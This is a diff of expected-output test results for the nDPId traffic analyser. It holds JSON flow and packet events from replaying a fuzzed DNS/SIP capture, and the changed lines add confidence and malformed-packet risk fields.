+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470208684,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470216686,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470216686,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470015072,"flow_last_seen":1120470024079,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470216686,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470216686,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470216686,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470216686,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470216686,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470113337,"flow_last_seen":1120470121594,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1120470216686,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470216686,"flow_last_seen":1120470216686,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1120470216686,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1120470216686,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":17,"ts_msec":1120470216686,"pkt":"ADBUADRWAODtAW69CABFAAAlcwAAAIARTJrAqAECwKgBAQrJADUAMPj\/K\/YAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
 00528{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1120470216688,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470216688,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CskAR9t7K\/aAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1120470216688,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1120470216688,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470216783,"flow_last_seen":1120470216783,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470216783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1120470216783,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470216783,"pkt":"ADBUADRWAODtAW69CABFAABIar0AAIARTJTAqAECwKgBAQrKADUANKsCfvgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470216783,"flow_last_seen":1120470216783,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470216783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470216783,"flow_last_seen":1120470216783,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470216783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1120470217778,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470217778,"pkt":"ADBUADRWAODtAW69CABFAABIar4AAIARTJPAqAECwKgBAQrKADUANKsCfvgBAABXAAAAAAAABF9zaXAEX3VkcANzaXAJY3m9ZXJjaXR5AmRrAAAhAAE="}
-00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":315,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216783,"flow_last_seen":1120470217778,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470217778,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":315,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216783,"flow_last_seen":1120470217778,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470217778,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1120470219780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470219780,"pkt":"ADBUADRWAODtAW69CABFAABIar8AAIARTJLAqAECwKgBAQrKADUANKsCfvgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AnNrAAAhAAE="}
-00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.sk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.sk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":317,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":29440,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470221783,"pkt":"ADBUADRWAODtAW4lcwBFAABIasAAAIARTJHAqAECwKglcwDKADUANKsCfvgBAAABAAAAAAgABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":317,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":29440}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":318,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470225789,"pkt":"ADBUADRWAODtAW69CACbAABIasEEAIARTJDAqAECwKgBAQrKADUANKsCfvgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00179{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":318,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049185,"flow_last_seen":1120470049185,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470233791,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"67.168.1.1","src_port":2747,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470032178,"flow_last_seen":1120470041184,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470233791,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470233791,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470233791,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470049190,"flow_last_seen":1120470058198,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470233791,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":180000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"ts_msec":1120470233791,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470233791,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":180000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"ts_msec":1120470233791,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470233791,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470141614,"flow_last_seen":1120470150621,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470233791,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"ts_msec":1120470233791,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"ts_msec":1120470233791,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00404{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":82,"pkt_type":29440,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":82,"pkt_l4_len":0,"ts_msec":1120470233791,"pkt":"ADBUADRWAODtSm4lcwBFAABEasIAAIARTJPAqAECwKgBAQrLADUAMHT6r\/kAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":29440}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470233792,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00528{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1120470233792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470233792,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CssAR1d2r\/mAAAAmcwEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAYAAJxAACwlsb2NhbGhvc3QA"}
